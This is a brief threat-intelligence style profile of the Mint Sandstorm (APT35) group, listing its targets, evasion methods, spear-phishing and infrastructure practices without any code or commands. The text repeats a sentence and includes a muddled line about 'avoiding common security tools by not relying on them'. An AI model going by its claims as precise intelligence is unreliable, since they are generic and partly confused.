Mint Sandstorm is an alternate name for the group known as APT35

---

Mint Sandstorm is an advanced persistent threat (APT) that targets organizations in various industries, including finance and healthcare. It uses multiple techniques to evade detection by security tools, such as steganography, fileless execution, and obfuscation of malware code. The group behind Mint Sandstorm is highly skilled and has been active since at least 2013. They have targeted organizations in the United States, Europe, Asia, Africa, South America, and Australia.

Techniques, tactics and practices:

Mint Sandstorm uses multiple techniques to evade detection by security tools, such as steganography, fileless execution, and obfuscation of malware code. They also use various tactics like spear-phishing emails with customized messages that are tailored for specific targets, exploiting vulnerabilities in software or systems, and using legitimate software to hide their activities. Additionally, they employ a range of practices such as maintaining multiple domains and IP addresses, changing the infrastructure frequently, and avoiding common security tools by not relying on them.